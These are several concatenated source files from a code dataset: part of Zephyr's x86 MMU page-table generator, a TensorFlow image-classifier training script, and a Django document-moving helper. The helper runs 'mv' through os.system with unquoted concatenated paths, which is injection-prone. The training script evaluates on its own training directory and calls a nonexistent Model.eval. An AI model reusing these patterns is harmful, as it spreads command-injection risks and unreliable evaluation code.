self.tables[table.lookup(virt_addr)]\n\n # Set up entry in leaf page table\n if not reserve:\n table.map(virt_addr, phys_addr, flags)\n\n def reserve(self, virt_base, size, to_level=PT_LEVEL):\n \"\"\"Reserve page table space with already aligned virt_base and size\"\"\"\n debug(\"Reserving paging structures for 0x%x (0x%x)\" %\n (virt_base, size))\n\n align_check(virt_base, size)\n\n # How much memory is covered by leaf page table\n scope = 1 << self.levels[PD_LEVEL].addr_shift\n\n if virt_base % scope != 0:\n error(\"misaligned virtual address space, 0x%x not a multiple of 0x%x\" %\n (virt_base, scope))\n\n for addr in range(virt_base, virt_base + size, scope):\n self.map_page(addr, 0, 0, True, to_level)\n\n def reserve_unaligned(self, virt_base, size, to_level=PT_LEVEL):\n \"\"\"Reserve page table space with virt_base and size alignment\"\"\"\n # How much memory is covered by leaf page table\n scope = 1 << self.levels[PD_LEVEL].addr_shift\n\n mem_start = round_down(virt_base, scope)\n mem_end = round_up(virt_base + size, scope)\n mem_size = mem_end - mem_start\n\n self.reserve(mem_start, mem_size, to_level)\n\n def map(self, phys_base, virt_base, size, flags, level=PT_LEVEL):\n \"\"\"Map an address range in the page tables provided access flags.\n If virt_base is None, identity mapping using phys_base is done.\n \"\"\"\n is_identity_map = virt_base is None or virt_base == phys_base\n\n if virt_base is None:\n virt_base = phys_base\n\n scope = 1 << self.levels[level].addr_shift\n\n debug(\"Mapping 0x%x (0x%x) to 0x%x: %s\" %\n (phys_base, size, virt_base, dump_flags(flags)))\n\n align_check(phys_base, size, scope)\n align_check(virt_base, size, scope)\n for paddr in range(phys_base, phys_base + size, scope):\n if is_identity_map and paddr == 0 and level == PT_LEVEL:\n # Never map the NULL page at page table level.\n continue\n\n vaddr = virt_base + (paddr - phys_base)\n\n self.map_page(vaddr, paddr, flags, False, level)\n\n def identity_map_unaligned(self, phys_base, size, flags, level=PT_LEVEL):\n \"\"\"Identity map a region of memory\"\"\"\n scope = 1 << self.levels[level].addr_shift\n\n phys_aligned_base = round_down(phys_base, scope)\n phys_aligned_end = round_up(phys_base + size, scope)\n phys_aligned_size = phys_aligned_end - phys_aligned_base\n\n self.map(phys_aligned_base, None, phys_aligned_size, flags, level)\n\n def map_region(self, name, flags, virt_to_phys_offset, level=PT_LEVEL):\n \"\"\"Map a named region\"\"\"\n if not isdef(name + \"_start\"):\n # Region may not exists\n return\n\n region_start = syms[name + \"_start\"]\n region_end = syms[name + \"_end\"]\n region_size = region_end - region_start\n\n region_start_phys = region_start\n\n if virt_to_phys_offset is not None:\n region_start_phys += virt_to_phys_offset\n\n self.map(region_start_phys, region_start, region_size, flags, level)\n\n def set_region_perms(self, name, flags, level=PT_LEVEL):\n \"\"\"Set access permissions for a named region that is already mapped\n\n The bounds of the region will be looked up in the symbol table\n with _start and _size suffixes. The physical address mapping\n is unchanged and this will not disturb any double-mapping.\"\"\"\n if not isdef(name + \"_start\"):\n # Region may not exists\n return\n\n # Doesn't matter if this is a virtual address, we have a\n # either dual mapping or it's the same as physical\n base = syms[name + \"_start\"]\n\n if isdef(name + \"_size\"):\n size = syms[name + \"_size\"]\n else:\n region_end = syms[name + \"_end\"]\n size = region_end - base\n\n if size == 0:\n return\n\n debug(\"change flags for %s at 0x%x (0x%x): %s\" %\n (name, base, size, dump_flags(flags)))\n\n num_levels = len(self.levels) + level + 1\n scope = 1 << self.levels[level].addr_shift\n\n align_check(base, size, scope)\n\n try:\n for addr in range(base, base + size, scope):\n # Never map the NULL page\n if addr == 0:\n continue\n\n table = self.toplevel\n for _ in range(1, num_levels):\n table = self.tables[table.lookup(addr)]\n table.set_perms(addr, flags)\n except KeyError:\n error(\"no mapping for %s region 0x%x (size 0x%x)\" %\n (name, base, size))\n\n def write_output(self, filename):\n \"\"\"Write the page tables to the output file in binary format\"\"\"\n written_size = 0\n\n with open(filename, \"wb\") as output_fp:\n for addr in sorted(self.tables):\n mmu_table = self.tables[addr]\n mmu_table_bin = mmu_table.get_binary()\n output_fp.write(mmu_table_bin)\n written_size += len(mmu_table_bin)\n\n # We always have the top-level table be last. This is because\n # in PAE, the top-level PDPT has only 4 entries and is not a\n # full page in size. We do not put it in the tables dictionary\n # and treat it as a special case.\n debug(\"top-level %s at physical addr 0x%x\" %\n (self.toplevel.__class__.__name__,\n self.get_new_mmutable_addr()))\n top_level_bin = self.toplevel.get_binary()\n output_fp.write(top_level_bin)\n written_size += len(top_level_bin)\n\n return written_size\n\n# Paging mode classes, we'll use one depending on configuration\nclass Ptables32bit(PtableSet):\n \"\"\"32-bit Page Tables\"\"\"\n levels = [Pd, Pt]\n\nclass PtablesPAE(PtableSet):\n \"\"\"PAE Page Tables\"\"\"\n levels = [PdptPAE, PdXd, PtXd]\n\nclass PtablesIA32e(PtableSet):\n \"\"\"Page Tables under IA32e mode\"\"\"\n levels = [Pml4, Pdpt, PdXd, PtXd]\n\n\ndef parse_args():\n \"\"\"Parse command line arguments\"\"\"\n global args\n\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter, allow_abbrev=False)\n\n parser.add_argument(\"-k\", \"--kernel\", required=True,\n help=\"path to prebuilt kernel ELF binary\")\n parser.add_argument(\"-o\", \"--output\", required=True,\n help=\"output file\")\n parser.add_argument(\"--map\", action='append',\n help=textwrap.dedent('''\\\n Map extra memory:\n ,[,[,]]\n where flags can be empty or combination of:\n L - Large page (2MB or 4MB),\n U - Userspace accessible,\n W - Writable,\n X - Executable,\n D - Cache disabled.\n Default is\n small (4KB) page,\n supervisor only,\n read only,\n and execution disabled.\n '''))\n parser.add_argument(\"-v\", \"--verbose\", action=\"count\",\n help=\"Print extra debugging information\")\n args = parser.parse_args()\n if \"VERBOSE\" in os.environ:\n args.verbose = 1\n\n\ndef get_symbols(elf_obj):\n \"\"\"Get all symbols from the ELF file\"\"\"\n for section in elf_obj.iter_sections():\n if isinstance(section, SymbolTableSection):\n return {sym.name: sym.entry.st_value\n for sym in section.iter_symbols()}\n\n raise LookupError(\"Could not find symbol table\")\n\ndef isdef(sym_name):\n \"\"\"True if symbol is defined in ELF file\"\"\"\n return sym_name in syms\n\n\ndef find_symbol(obj, name):\n \"\"\"Find symbol object from ELF file\"\"\"\n for section in obj.iter_sections():\n if isinstance(section, SymbolTableSection):\n for sym in section.iter_symbols():\n if sym.name == name:\n return sym\n\n return None\n\n\ndef map_extra_regions(pt):\n \"\"\"Map extra regions specified in command line\"\"\"\n # Extract command line arguments\n mappings = []\n\n for entry in args.map:\n elements = entry.split(',')\n\n if len(elements) < 2:\n error(\"Not enough arguments for --map %s\" % entry)\n\n one_map = {}\n\n one_map['cmdline'] = entry\n one_map['phys'] = int(elements[0], 0)\n one_map['size']= int(elements[1], 0)\n one_map['large_page'] = False\n\n flags = FLAG_P | ENTRY_XD\n if len(elements) > 2:\n map_flags = elements[2]\n\n # Check for allowed flags\n if not bool(re.match('^[LUWXD]*$', map_flags)):\n error(\"Unrecognized flags: %s\" % map_flags)\n\n flags = FLAG_P | ENTRY_XD\n if 'W' in map_flags:\n flags |= ENTRY_RW\n if 'X' in map_flags:\n flags &= ~ENTRY_XD\n if 'U' in map_flags:\n flags |= ENTRY_US\n if 'L' in map_flags:\n flags |= FLAG_SZ\n one_map['large_page'] = True\n if 'D' in map_flags:\n flags |= FLAG_CD\n\n one_map['flags'] = flags\n\n if len(elements) > 3:\n one_map['virt'] = int(elements[3], 16)\n else:\n one_map['virt'] = one_map['phys']\n\n mappings.append(one_map)\n\n # Map the regions\n for one_map in mappings:\n phys = one_map['phys']\n size = one_map['size']\n flags = one_map['flags']\n virt = one_map['virt']\n level = PD_LEVEL if one_map['large_page'] else PT_LEVEL\n\n # Check if addresses have already been mapped.\n # Error out if so as they could override kernel mappings.\n if pt.is_region_mapped(virt, size, level):\n error((\"Region 0x%x (%d) already been mapped \"\n \"for --map %s\" % (virt, size, one_map['cmdline'])))\n\n # Reserve space in page table, and map the region\n pt.reserve_unaligned(virt, size, level)\n pt.map(phys, virt, size, flags, level)\n\n\ndef main():\n \"\"\"Main program\"\"\"\n global syms\n parse_args()\n\n with open(args.kernel, \"rb\") as elf_fp:\n kernel = ELFFile(elf_fp)\n syms = get_symbols(kernel)\n\n sym_dummy_pagetables = find_symbol(kernel, \"dummy_pagetables\")\n if sym_dummy_pagetables:\n reserved_pt_size = sym_dummy_pagetables['st_size']\n else:\n reserved_pt_size = None\n\n if isdef(\"CONFIG_X86_64\"):\n pclass = PtablesIA32e\n elif isdef(\"CONFIG_X86_PAE\"):\n pclass = PtablesPAE\n else:\n pclass = Ptables32bit\n\n debug(\"building %s\" % pclass.__name__)\n\n vm_base = syms[\"CONFIG_KERNEL_VM_BASE\"]\n vm_size = syms[\"CONFIG_KERNEL_VM_SIZE\"]\n vm_offset = syms[\"CONFIG_KERNEL_VM_OFFSET\"]\n\n sram_base = syms[\"CONFIG_SRAM_BASE_ADDRESS\"]\n sram_size = syms[\"CONFIG_SRAM_SIZE\"] * 1024\n\n mapped_kernel_base = syms[\"z_mapped_start\"]\n mapped_kernel_size = syms[\"z_mapped_size\"]\n\n if isdef(\"CONFIG_SRAM_OFFSET\"):\n sram_offset = syms[\"CONFIG_SRAM_OFFSET\"]\n else:\n sram_offset = 0\n\n # Figure out if there is any need to do virtual-to-physical\n # address translation\n virt_to_phys_offset = (sram_base + sram_offset) - (vm_base + vm_offset)\n\n if isdef(\"CONFIG_ARCH_MAPS_ALL_RAM\"):\n image_base = sram_base\n image_size = sram_size\n else:\n image_base = mapped_kernel_base\n image_size = mapped_kernel_size\n\n image_base_phys = image_base + virt_to_phys_offset\n\n ptables_phys = syms[\"z_x86_pagetables_start\"] + virt_to_phys_offset\n\n debug(\"Address space: 0x%x - 0x%x size 0x%x\" %\n (vm_base, vm_base + vm_size - 1, vm_size))\n\n debug(\"Zephyr image: 0x%x - 0x%x size 0x%x\" %\n (image_base, image_base + image_size - 1, image_size))\n\n if virt_to_phys_offset != 0:\n debug(\"Physical address space: 0x%x - 0x%x size 0x%x\" %\n (sram_base, sram_base + sram_size - 1, sram_size))\n\n is_perm_regions = isdef(\"CONFIG_SRAM_REGION_PERMISSIONS\")\n\n # Are pages in non-boot, non-pinned sections present at boot.\n is_generic_section_present = isdef(\"CONFIG_LINKER_GENERIC_SECTIONS_PRESENT_AT_BOOT\")\n\n if image_size >= vm_size:\n error(\"VM size is too small (have 0x%x need more than 0x%x)\" % (vm_size, image_size))\n\n map_flags = 0\n\n if is_perm_regions:\n # Don't allow execution by default for any pages. We'll adjust this\n # in later calls to pt.set_region_perms()\n map_flags = ENTRY_XD\n\n pt = pclass(ptables_phys)\n # Instantiate all the paging structures for the address space\n pt.reserve(vm_base, vm_size)\n # Map the zephyr image\n if is_generic_section_present:\n map_flags = map_flags | FLAG_P\n pt.map(image_base_phys, image_base, image_size, map_flags | ENTRY_RW)\n else:\n # When generic linker sections are not present in physical memory,\n # the corresponding virtual pages should not be mapped to non-existent\n # physical pages. So simply identity map them to create the page table\n # entries but without the present bit set.\n # Boot and pinned sections (if configured) will be mapped to\n # physical memory below.\n pt.map(image_base, image_base, image_size, map_flags | ENTRY_RW)\n\n if virt_to_phys_offset != 0:\n # Need to identity map the physical address space\n # as it is needed during early boot process.\n # This will be unmapped once z_x86_mmu_init()\n # is called.\n # Note that this only does the identity mapping\n # at the page directory level to minimize wasted space.\n pt.reserve_unaligned(image_base_phys, image_size, to_level=PD_LEVEL)\n pt.identity_map_unaligned(image_base_phys, image_size,\n FLAG_P | FLAG_RW | FLAG_SZ, level=PD_LEVEL)\n\n if isdef(\"CONFIG_X86_64\"):\n # 64-bit has a special region in the first 64K to bootstrap other CPUs\n # from real mode\n locore_base = syms[\"_locore_start\"]\n locore_size = syms[\"_lodata_end\"] - locore_base\n debug(\"Base addresses: physical 0x%x size 0x%x\" % (locore_base,\n locore_size))\n pt.map(locore_base, None, locore_size, map_flags | FLAG_P | ENTRY_RW)\n\n if isdef(\"CONFIG_XIP\"):\n # Additionally identity-map all ROM as read-only\n pt.map(syms[\"CONFIG_FLASH_BASE_ADDRESS\"], None,\n syms[\"CONFIG_FLASH_SIZE\"] * 1024, map_flags | FLAG_P)\n\n if isdef(\"CONFIG_LINKER_USE_BOOT_SECTION\"):\n pt.map_region(\"lnkr_boot\", map_flags | FLAG_P | ENTRY_RW, virt_to_phys_offset)\n\n if isdef(\"CONFIG_LINKER_USE_PINNED_SECTION\"):\n pt.map_region(\"lnkr_pinned\", map_flags | FLAG_P | ENTRY_RW, virt_to_phys_offset)\n\n # Process extra mapping requests\n if args.map:\n map_extra_regions(pt)\n\n # Adjust mapped region permissions if configured\n if is_perm_regions:\n # Need to accomplish the following things:\n # - Text regions need the XD flag cleared and RW flag removed\n # if not built with gdbstub support\n # - Rodata regions need the RW flag cleared\n # - User mode needs access as we currently do not separate application\n # text/rodata from kernel text/rodata\n if isdef(\"CONFIG_GDBSTUB\"):\n flags = ENTRY_US | ENTRY_RW\n else:\n flags = ENTRY_US\n\n if is_generic_section_present:\n flags = flags | FLAG_P\n\n pt.set_region_perms(\"__text_region\", flags)\n\n if isdef(\"CONFIG_LINKER_USE_BOOT_SECTION\"):\n pt.set_region_perms(\"lnkr_boot_text\", flags | FLAG_P)\n\n if isdef(\"CONFIG_LINKER_USE_PINNED_SECTION\"):\n pt.set_region_perms(\"lnkr_pinned_text\", flags | FLAG_P)\n\n flags = ENTRY_US | ENTRY_XD\n if is_generic_section_present:\n flags = flags | FLAG_P\n\n pt.set_region_perms(\"__rodata_region\", flags)\n\n if isdef(\"CONFIG_LINKER_USE_BOOT_SECTION\"):\n pt.set_region_perms(\"lnkr_boot_rodata\", flags | FLAG_P)\n\n if isdef(\"CONFIG_LINKER_USE_PINNED_SECTION\"):\n pt.set_region_perms(\"lnkr_pinned_rodata\", flags | FLAG_P)\n\n if isdef(\"CONFIG_COVERAGE_GCOV\") and isdef(\"CONFIG_USERSPACE\"):\n # If GCOV is enabled, user mode must be able to write to its\n # common data area\n pt.set_region_perms(\"__gcov_bss\",\n FLAG_P | ENTRY_RW | ENTRY_US | ENTRY_XD)\n\n if isdef(\"CONFIG_X86_64\"):\n # Set appropriate permissions for locore areas much like we did\n # with the main text/rodata regions\n\n if isdef(\"CONFIG_X86_KPTI\"):\n # Set the User bit for the read-only locore/lorodata areas.\n # This ensures they get mapped into the User page tables if\n # KPTI is turned on. There is no sensitive data in them, and\n # they contain text/data needed to take an exception or\n # interrupt.\n flag_user = ENTRY_US\n else:\n flag_user = 0\n\n pt.set_region_perms(\"_locore\", FLAG_P | flag_user)\n pt.set_region_perms(\"_lorodata\", FLAG_P | ENTRY_XD | flag_user)\n\n written_size = pt.write_output(args.output)\n debug(\"Written %d bytes to %s\" % (written_size, args.output))\n\n # Warn if reserved page table is not of correct size\n if reserved_pt_size and written_size != reserved_pt_size:\n # Figure out how many extra pages needed\n size_diff = written_size - reserved_pt_size\n page_size = syms[\"CONFIG_MMU_PAGE_SIZE\"]\n extra_pages_needed = int(round_up(size_diff, page_size) / page_size)\n\n if isdef(\"CONFIG_X86_EXTRA_PAGE_TABLE_PAGES\"):\n extra_pages_kconfig = syms[\"CONFIG_X86_EXTRA_PAGE_TABLE_PAGES\"]\n if isdef(\"CONFIG_X86_64\"):\n extra_pages_needed += ctypes.c_int64(extra_pages_kconfig).value\n else:\n extra_pages_needed += ctypes.c_int32(extra_pages_kconfig).value\n\n reason = \"big\" if reserved_pt_size > written_size else \"small\"\n\n error((\"Reserved space for page table is too %s.\"\n \" Set CONFIG_X86_EXTRA_PAGE_TABLE_PAGES=%d\") %\n (reason, extra_pages_needed))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zephyrproject-rtos/zephyr","sub_path":"arch/x86/gen_mmu.py","file_name":"gen_mmu.py","file_ext":"py","file_size_in_byte":29828,"program_lang":"python","lang":"en","doc_type":"code","stars":8707,"dataset":"github-code","pt":"66"} +{"seq_id":"15074546414","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom PIL import Image\r\n#import cv2\r\nimport shutil\r\nimport time\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\n\r\n####################### Parameters #######################\r\nClass_Amounts = 2\r\nMax_Data_Amount = 223 # For Each Class\r\nAugmenting = 1 # 1: Active, 0: Disable\r\nRounds = 20 # Iterations Of Iterative Training\r\nEpoch_Per_Round = 5\r\nTraining_Batch = 69\r\n####################### Loading Data #######################\r\n# Extracting Files Address\r\n# Train Data\r\n#from sklearn.utils import shuffle\r\n#from sklearn.model_selection import train_test_split\r\n\r\nRoot_Address = [\"/Dataset/Train/\"]\r\n\r\n\r\nX_Address = []\r\nY = []\r\nClasses_Count = []\r\n\r\nfor j in range(len(Root_Address)):\r\n Base_Address = os.getcwd() + Root_Address[j]\r\n\r\n Classes = os.listdir(Base_Address)\r\n Classes.sort()\r\n print(Classes)\r\n print(\"----------------------- -----------------------\")\r\n\r\n Temp_Address = []\r\n for i in range(len(Classes)):\r\n Classes_Count += [0]\r\n Class_Address = Base_Address + \"/\" + str(Classes[i])\r\n Temp_Address += [Class_Address + \"/\" + j + \"/\" for j in os.listdir(Class_Address)]\r\n Temp_Address.sort()\r\n print(Class_Address)\r\n \r\n while len(Temp_Address) != 0:\r\n Temp = os.listdir(Temp_Address[0])\r\n if np.any([\".jpg\" in name.lower() for name in Temp]):\r\n Temp = [Temp_Address[0] + j for j in Temp if \".jpg\" in j.lower()]\r\n Temp.sort()\r\n Temp = Temp[2:]\r\n X_Address += Temp\r\n Y += [Classes[i] for j in range(len(Temp))]\r\n \"\"\"\r\n if \"/SELECTED 4010928\" in Root_Address[j] or \"/selected 4011005/\" in Root_Address[j]: # Duplicate Low Quality Data\r\n X_Address += Temp\r\n Y += [Classes[i] for j in range(len(Temp))]\r\n \"\"\"\r\n Classes_Count[-1] += len(Temp)\r\n else:\r\n Temp_Address += [Temp_Address[0] + j + \"/\" for j in Temp]\r\n Temp_Address.pop(0)\r\n #\r\n print(\"%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%\")\r\n\r\n\r\n#from sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\n\r\nEncoding = LabelEncoder().fit(Y)\r\nY = Encoding.transform(Y)\r\n#Y = Encoding.inverse_transform(Y)\r\nprint(Encoding.classes_)\r\n\r\nif len(Y.shape) == 1:\r\n Y = np.expand_dims(Y, axis = 1)\r\n\r\nOneHot = OneHotEncoder().fit(Y)\r\nY = OneHot.transform(Y).toarray()\r\n\r\n#X_Address, Y = shuffle(X_Address, Y)\r\nprint()\r\n\r\n\r\n# Test Data\r\nRoot_Address = [\"/Dataset/Train/\"]\r\n#Base_Address = os.getcwd() + \"/selected 4011030\"\r\nBase_Address = Root_Address[0]\r\n\r\nClasses = os.listdir(Base_Address)\r\nClasses.sort()\r\nprint(Classes)\r\nprint(\"----------------------- ----------------------- -----------------------\")\r\n\r\nX_Test_Address = []\r\nY_Test = []\r\nClasses_Count = []\r\n\r\nTemp_Address = []\r\nfor i in range(len(Classes)):\r\n Classes_Count += [0]\r\n Class_Address = Base_Address + \"/\" + str(Classes[i])\r\n Temp_Address += [Class_Address + \"/\" + j + \"/\" for j in os.listdir(Class_Address)]\r\n Temp_Address.sort()\r\n print(Class_Address)\r\n \r\n while len(Temp_Address) != 0:\r\n Temp = os.listdir(Temp_Address[0])\r\n if np.any([\".jpg\" in name.lower() for name in Temp]):\r\n Temp = [Temp_Address[0] + j for j in Temp if \".jpg\" in j.lower()]\r\n Temp.sort()\r\n Temp = Temp[2:]\r\n X_Test_Address += Temp\r\n Y_Test += [Classes[i] for j in range(len(Temp))]\r\n Classes_Count[-1] += len(Temp)\r\n else:\r\n Temp_Address += [Temp_Address[0] + j + \"/\" for j in Temp]\r\n Temp_Address.pop(0)\r\n #\r\n \r\n# Loading Test Data From Extracted Files Address\r\n\r\nX_Test = []\r\n\r\nResize_Shape = (256, 256)\r\n\r\nfor i in range(len(X_Test_Address)):\r\n X_Test += [np.array(Image.open(X_Test_Address[i]).resize(Resize_Shape, Image.ANTIALIAS))]\r\n\r\n#X = np.array(X, dtype = np.float32) / 255.0\r\nX_Test = np.array(X_Test, dtype = np.float16) / 255.0\r\nY_Test = Encoding.transform(Y_Test)\r\n\r\nif len(Y_Test.shape) == 1:\r\n Y_Test = np.expand_dims(Y_Test, 1)\r\nY_Test = OneHot.transform(Y_Test).toarray()\r\nprint()\r\n\r\nif \"Class_Amounts\" not in globals() or \"Class_Amounts\" not in locals():\r\n Class_Amounts = len(Classes)\r\n\r\n####################### Model #######################\r\nModel_Name = \"Model_20230827\"\r\n\r\n#Input_Shape = (256, 256, 3)\r\n#L_0 = tf.keras.layers.Input(shape = Input_Shape)\r\nL_0 = tf.keras.layers.Input(shape = X_Test.shape[1:])\r\n\r\nL_1 = tf.keras.layers.Conv2D(16, (3, 3), activation = \"relu\", padding = \"same\")(L_0)\r\nL_1 = tf.keras.layers.BatchNormalization()(L_1)\r\nL_1 = tf.keras.layers.Conv2D(16, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_1)\r\n\r\nL_2 = tf.keras.layers.Conv2D(16, (3, 3), activation = \"relu\", padding = \"same\")(L_1)\r\nL_2 = tf.keras.layers.BatchNormalization()(L_2)\r\nL_2 = tf.keras.layers.Conv2D(16, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_2)\r\n\r\nL_3 = tf.keras.layers.Conv2D(16, (3, 3), activation = \"relu\", padding = \"same\")(L_2)\r\nL_3 = tf.keras.layers.BatchNormalization()(L_3)\r\nL_3 = tf.keras.layers.Conv2D(24, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_3)\r\n\r\nL_4 = tf.keras.layers.Conv2D(24, (3, 3), activation = \"relu\", padding = \"same\")(L_3)\r\nL_4 = tf.keras.layers.BatchNormalization()(L_4)\r\nL_4 = tf.keras.layers.Conv2D(24, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_4)\r\n\r\nL_5 = tf.keras.layers.Conv2D(24, (3, 3), activation = \"relu\", padding = \"same\")(L_4)\r\nL_5 = tf.keras.layers.BatchNormalization()(L_5)\r\nL_5 = tf.keras.layers.Conv2D(24, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_5)\r\n\r\nL_6 = tf.keras.layers.Conv2D(24, (3, 3), activation = \"relu\", padding = \"same\")(L_5)\r\nL_6 = tf.keras.layers.BatchNormalization()(L_6)\r\nL_6 = tf.keras.layers.Conv2D(32, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_6)\r\n\r\nL_7 = tf.keras.layers.Conv2D(32, (3, 3), activation = \"relu\", padding = \"same\")(L_6)\r\nL_7 = tf.keras.layers.BatchNormalization()(L_7)\r\nL_7 = tf.keras.layers.Conv2D(32, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_7)\r\n\r\nL_Out = L_7\r\n\r\nL_Out = tf.keras.layers.Flatten()(L_Out)\r\nL_Out = tf.keras.layers.Dense(Class_Amounts, activation = \"softmax\")(L_Out)\r\n\r\n\r\nModel = tf.keras.Model(inputs = L_0, outputs = L_Out)\r\n\r\nprint(\"Model Parameters:\", Model.count_params(), \"\\tLayers:\", len(Model.layers))\r\n\r\ntf.keras.utils.plot_model(Model, show_shapes = True\r\n , show_dtype = True, show_layer_names = True\r\n , show_layer_activations = True, to_file = os.getcwd() + \"/Model_Structure.png\")\r\n\r\n\r\nModel.compile(loss = tf.keras.losses.BinaryCrossentropy(), optimizer = \"Adam\", metrics = [\"Acc\", \"MSLE\"]) # , \"MSE\", \"MAE\"\r\n\r\n\r\n####################### Training #######################\r\n\r\n#from sklearn.utils import shuffle\r\n#from sklearn.model_selection import train_test_split\r\n\r\nTemp = []\r\nfor i in range(len(Classes)):\r\n Temp += [len([j for j in range(len(X_Address)) if np.argmax(Y[j]) == i])]\r\n\r\n#Data_Amount = np.min([int(0.71 * np.min(Temp)), 223])\r\nData_Amount = np.min([int(0.71 * np.min(Temp)), Max_Data_Amount])\r\n\r\nResize_Shape = (256, 256)\r\nHistory = pd.DataFrame([])\r\n\r\nif os.path.isdir(os.getcwd() + \"/Model/\" + Model_Name + \"/\") and os.path.isfile(os.getcwd() + \"/Model/\" + Model_Name + \"/saved_model.pb\"):\r\n print(\"Model Exist => Loading...\")\r\n Model = tf.keras.models.load_model(os.getcwd() + \"/Model/\" + Model_Name + \"/\")\r\n History = pd.read_csv(os.getcwd() + \"/Model/\" + Model_Name + \"/History.csv\")\r\n History = History.drop(columns = History.keys()[0])\r\n print(\"Model Was Loaded!!\")\r\n\r\n\r\nfor i in range(Rounds):\r\n print(\"Round\", i+1, \"/\", Rounds)\r\n \r\n # Balanced Data\r\n X_Address, Y = shuffle(X_Address, Y) # , random_state = 23\r\n X_Train = []\r\n Y_Train = []\r\n for i in range(len(Classes)):\r\n Temp = [j for j in range(len(X_Address)) if np.argmax(Y[j]) == i][:Data_Amount]\r\n X_Train += np.array(X_Address)[Temp].tolist()\r\n Y_Train += Y[Temp].tolist()\r\n Y_Train = np.array(Y_Train)\r\n #\r\n print(\"Loading Data...\")\r\n X = []\r\n for i in range(len(X_Train)):\r\n X += [np.array(Image.open(X_Train[i]).resize(Resize_Shape, Image.ANTIALIAS))]\r\n\r\n X = np.array(X, dtype = np.float16) / 255.0\r\n print(\"Data Is Just Loaded!!\")\r\n #\r\n # Augmentation\r\n if Augmenting == 1:\r\n print(\"Augmentation\")\r\n X_2 = np.flip(X, axis = 1) # UpDown\r\n X_3 = np.flip(X, axis = 2) # Left To Right\r\n X_4 = np.rot90(X, k = 1, axes = (1, 2)) # k = 1: 1 Time That Means 90 Degrees,\r\n X_5 = np.rot90(X, k = 3, axes = (1, 2)) # k = 3: 3 Time That Means 270 Degrees,\r\n X_6 = np.flip(X_3, axis = 1) # UpDown\r\n X_7 = np.flip(X_4, axis = 2) # Left To Right\r\n X_8 = np.flip(X_5, axis = 1) # UpDown\r\n X_9 = tf.image.adjust_contrast(X, 2.3).numpy() # Increase Contrast By Factor 2.3\r\n\r\n X_Aug = np.concatenate((X, X_2, X_3, X_4, X_5, X_6, X_7, X_8, X_9))\r\n Y_Aug = np.concatenate(tuple([Y_Train for i in range(int(X_Aug.shape[0] / X.shape[0]))])) # np.transpose(np.tile(np.transpose(Y), 8))\r\n del X_2, X_3, X_4, X_5, X_6, X_7, X_8, X_9\r\n X = X_Aug\r\n Y_Train = Y_Aug\r\n del X_Aug, Y_Aug\r\n #\r\n X_Train = np.copy(X)\r\n del X\r\n #\r\n Model.fit(X_Train, Y_Train, batch_size = Training_Batch, epochs = Epoch_Per_Round, validation_data = (X_Test, Y_Test))\r\n #\r\n # History\r\n if len(Model.history.history[\"loss\"]) != 0:\r\n Temp_History = Model.history.history\r\n if len(History) != 0:\r\n History = pd.concat([History, pd.DataFrame(Temp_History, columns = Temp_History.keys())], ignore_index = True)\r\n else:\r\n History = pd.DataFrame(Temp_History, columns = Temp_History.keys())\r\n #\r\n\r\n Model.save(os.getcwd() + \"/Model/\" + Model_Name + \"/\")\r\n History.to_csv(os.getcwd() + \"/Model/\" + Model_Name + \"/History.csv\")\r\n #\r\n Model = tf.keras.models.load_model(os.getcwd() + \"/Model/\" + Model_Name + \"/\")\r\n #\r\n print(\"----------------------- ----------------------- ----------------------- -----------------------\")\r\n\r\n\r\n####################### Classification Report #######################\r\n\r\n#from sklearn.metrics import classification_report, confusion_matrix\r\nprint(\"Model Evaluation:\", Model.eval(X_Test, Y_Test))\r\nprint(\"::::::::::::::::::::::: ::::::::::::::::::::::: ::::::::::::::::::::::: :::::::::::::::::::::::\")\r\nprint(confusion_matrix(Y_Test, Model.predict(X_Test)))\r\nprint(\"::::::::::::::::::::::: ::::::::::::::::::::::: ::::::::::::::::::::::: :::::::::::::::::::::::\")\r\nprint(classification_report(np.argmax(Y_Test, axis = 1), np.argmax(Model.predict(X_Test), axis = 1) ))\r\n\r\n\"\"\"####################### Loading Data #######################\"\"\"\r\n\r\nprint(\"Training Is Finished, Hope The Results Were Good Enough.\")\r\n","repo_name":"DRAGON20-3/Retinopathy_of_Prematurity","sub_path":"ROP_Detection/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":10840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9430146305","text":"from documents.models import Document\nfrom categories.models import Category\nimport os\n\n\ndef move_doc(doc_id, cat_id):\n doc = Document.objects.get(pk=int(doc_id))\n old_cat = doc.refer_category\n new_cat = Category.objects.get(pk=int(cat_id))\n for p in doc.pages.all():\n cmd = \"mv \" + p.get_absolute_path() + \" \" + new_cat.get_absolute_path() + \"/\"\n os.system(cmd)\n doc.refer_category = new_cat\n doc.save()\n old_cat.documents.remove(doc)\n new_cat.documents.add(doc)\n\n\n","repo_name":"Foxugly/MyTaxAccountant","sub_path":"scripts/move_document.py","file_name":"move_document.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"41250675553","text":"# -----------------------------------------------------------------------\n#\n# nir library v0.1.3\n# ------------------\n# (Newman, Ian R = nir)\n# https://github.com/irnewman/nir\n#\n# This is a library of tools for the Cognitive Science Lab at the \n# University of Saskatchewan. Please note that this is a work in progress\n# and is written by an amateur; use at your own risk!\n#\n# All correspondence should be directed to:\n#\n# Ian R. Newman\n# 